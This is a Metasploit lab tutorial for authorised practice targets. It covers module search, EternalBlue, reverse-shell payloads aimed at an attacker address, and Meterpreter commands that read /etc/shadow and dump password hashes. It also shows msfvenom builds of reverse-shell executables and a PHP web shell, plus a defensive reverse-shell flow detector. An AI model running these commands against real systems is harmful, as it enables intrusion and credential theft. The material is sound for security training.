🎯 Lab Objectives

  • Navigate the msfconsole interface and understand the module structure
  • Search for, select, and configure exploit modules
  • Understand the difference between staged and stageless payloads
  • Gain a Meterpreter shell and navigate it effectively
  • Perform basic post-exploitation: system info, privilege check, file access
  • Generate standalone payloads with MSFvenom
🚨 Authorised Use Only. Metasploit is a powerful exploitation framework. Only use it against systems you own or have explicit written permission to test. Use Metasploitable2 or a local VM as your practice target.

What is Metasploit?

The Metasploit Framework is the world's most widely used penetration testing platform, developed by Rapid7. It contains hundreds of pre-built exploits, payloads, encoders, and post-exploitation modules — letting you go from vulnerability to shell quickly and reliably.

Key components:

  • Exploits — Code that takes advantage of a vulnerability
  • Payloads — Code that runs on the target after exploitation (e.g. a shell)
  • Auxiliaries — Scanners, fuzzers, and other support modules
  • Post modules — Post-exploitation: credential dumping, pivoting, persistence
  • Encoders — Obfuscate payloads to evade AV detection

Step 1 — Starting msfconsole

Launch and initialise Metasploit

# Start the PostgreSQL database (Metasploit uses it to store data)
sudo systemctl start postgresql

# Initialise the database on first run
sudo msfdb init

# Launch the console
sudo msfconsole

# Verify database connection
msf6 > db_status
Connected to msf. Connection type: postgresql.

# Check version
msf6 > version

Step 2 — Searching for Modules

Find the right exploit or module

# Search by keyword
msf6 > search eternalblue

msf6 > search type:exploit platform:linux apache

# Search by CVE number
msf6 > search cve:2021-44228

# Search by service
msf6 > search name:smb type:exploit

# List all auxiliary scanners for a service
msf6 > search type:auxiliary name:ssh

The search results include a Rank column. Ranks from best to worst are: excellent, great, good, normal, average, low, manual. Prefer modules ranked excellent or great; lower ranks are more likely to fail or crash the target service.

Step 3 — Using an Exploit Module

Select a module and examine its options

# Use a module (by number from search results or full path)
msf6 > use exploit/multi/handler
msf6 > use 0   # use first result from last search

# Example: MS17-010 EternalBlue (SMB exploit)
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Show all required and optional options
msf6 exploit(ms17_010_eternalblue) > show options

# Get detailed info about the module
msf6 exploit(ms17_010_eternalblue) > info

Step 4 — Understanding Payloads

A payload is what runs on the target machine after the exploit succeeds. The two main types are:

  • Staged (windows/x64/meterpreter/reverse_tcp) — Small stager connects back, then downloads the full payload. Smaller size, needs two connections.
  • Stageless (windows/x64/meterpreter_reverse_tcp) — Full payload in one. Larger but self-contained. Better for unstable networks.

# List payloads compatible with current exploit
msf6 exploit(ms17_010_eternalblue) > show payloads

# Common payloads
# Windows reverse Meterpreter (staged)
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Linux reverse Meterpreter (staged)
set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Simple bash reverse shell
set PAYLOAD cmd/unix/reverse_bash

Step 5 — Setting Options

Configure RHOST, LHOST, LPORT and other required options

# Set target host
set RHOSTS 10.10.10.1
set RHOSTS 192.168.1.0/24   # entire subnet

# Set your attack machine IP (for reverse shells)
set LHOST 10.10.14.5
set LHOST tun0   # use VPN interface name directly

# Set listening port
set LPORT 4444

# Verify all options are set correctly
show options

# Check if target appears vulnerable
check

Step 6 — Running the Exploit

Launch the exploit and catch a shell

# Run the exploit
run
# or:
exploit

# Run as a background job
exploit -j

# List background jobs
jobs

# List active sessions
sessions -l

# Interact with session 1
sessions -i 1

Step 7 — Meterpreter Basics

Meterpreter is Metasploit's advanced payload that runs entirely in memory, making it hard to detect. It gives you a rich set of commands to interact with the target.

Essential Meterpreter commands

# System information
meterpreter > sysinfo
meterpreter > getuid        # current user
meterpreter > getpid        # process ID

# File system navigation
meterpreter > pwd
meterpreter > ls
meterpreter > cd /tmp
meterpreter > cat /etc/passwd

# Download / upload files
meterpreter > download /etc/shadow /tmp/shadow
meterpreter > upload /tmp/payload.sh /tmp/

# Drop into a system shell
meterpreter > shell

# Background the session
meterpreter > background

# Screenshot (Windows targets)
meterpreter > screenshot

Step 8 — Post-Exploitation Modules

Use post modules on an active session

# From msfconsole with active session in background

# Dump password hashes (Windows)
use post/windows/gather/hashdump
set SESSION 1
run

# Enumerate installed applications
use post/windows/gather/enum_applications
set SESSION 1
run

# Linux: gather configuration files (for SSH keys see post/multi/gather/ssh_creds)
use post/linux/gather/enum_configs
set SESSION 1
run

# Privilege escalation suggestions
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Step 9 — MSFvenom Payload Generation

MSFvenom is a standalone tool for generating payloads outside of msfconsole. Use it when you need a file to deliver to a target rather than using Metasploit directly.

# List all payload formats
msfvenom --list formats

# Windows reverse Meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f elf -o payload.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f raw -o shell.php

# Python one-liner
msfvenom -p cmd/unix/reverse_python \
  LHOST=10.10.14.5 LPORT=4444 -f raw

# Start a listener to catch the payload
msf6 > use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run
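From the defender's side, the defaults this lab relies on (a reverse connection from the target back to the handler on LPORT 4444, and a session that then stays open) are exactly what network monitoring keys on. The Python below is an added example, not part of the lab, that scans constructed flow records for those two traits; the monitored range, the port lists and the thresholds are assumptions.

```python
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

# Constructed sample flow records (not real traffic), one per line:
# "timestamp src_ip src_port dst_ip dst_port bytes_out duration_seconds"
SAMPLE_FLOWS = """\
2024-05-01T10:00:01 10.10.10.1 49211 10.10.14.5 4444 186 3600
2024-05-01T10:00:05 10.10.10.7 49212 93.184.216.34 443 5120 12
2024-05-01T10:01:00 10.10.10.1 49213 10.10.14.5 4444 0 0
2024-05-01T10:02:30 10.10.10.9 49214 10.10.14.5 8080 2048 5
""".splitlines()

MONITORED = ip_network("10.10.10.0/24")   # assumed: the segment we watch
HANDLER_DEFAULT_PORTS = {4444}            # the lab's default LPORT
COMMON_PORTS = {22, 53, 80, 443}          # outbound ports not treated as odd

@dataclass
class Finding:
    src: str
    dst: str
    dst_port: int
    reasons: list = field(default_factory=list)

def parse_flow(line: str) -> dict:
    """Split one space-separated flow record into typed fields."""
    ts, src, sport, dst, dport, nbytes, dur = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport),
            "bytes": int(nbytes), "duration": float(dur)}

def find_reverse_shell_candidates(lines, min_duration=300, max_bytes=4096):
    """Return one Finding per outbound flow that looks like a reverse-shell session."""
    findings = []
    for line in lines:
        f = parse_flow(line)
        # Only flows leaving the monitored segment are of interest here.
        if ip_address(f["src"]) not in MONITORED or ip_address(f["dst"]) in MONITORED:
            continue
        reasons = []
        if f["dport"] in HANDLER_DEFAULT_PORTS:
            reasons.append("destination port is a default Metasploit handler port")
        # A Meterpreter session idles for a long time while moving little data.
        if (f["dport"] not in COMMON_PORTS and f["duration"] >= min_duration
                and f["bytes"] <= max_bytes):
            reasons.append("long-lived, low-volume session on an uncommon port")
        if reasons:
            findings.append(Finding(f["src"], f["dst"], f["dport"], reasons))
    return findings
```

Against the sample, the first flow trips both rules and the third (a failed connect attempt to 4444) trips only the port rule; a real deployment would feed it from a flow exporter and tune the port list to the environment.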

📋 Metasploit Cheat Sheet

Command            Description
search <term>      Search modules by keyword/CVE
use <module>       Select a module
info               Show module details
show options       Show required/optional settings
show payloads      Compatible payloads
set <OPT> <val>    Set an option
check              Test if target is vulnerable
run / exploit      Execute the module
sessions -l        List active sessions
sessions -i 1      Interact with session 1
background         Background current session
getuid             Show current user (Meterpreter)
getsystem          Attempt privilege escalation
hashdump           Dump Windows password hashes
shell              Drop to OS shell
download / upload  Transfer files
✅ Lab Complete! You can now use Metasploit to find, configure, and run exploits. Next, learn how to crack credentials with John the Ripper and Hashcat.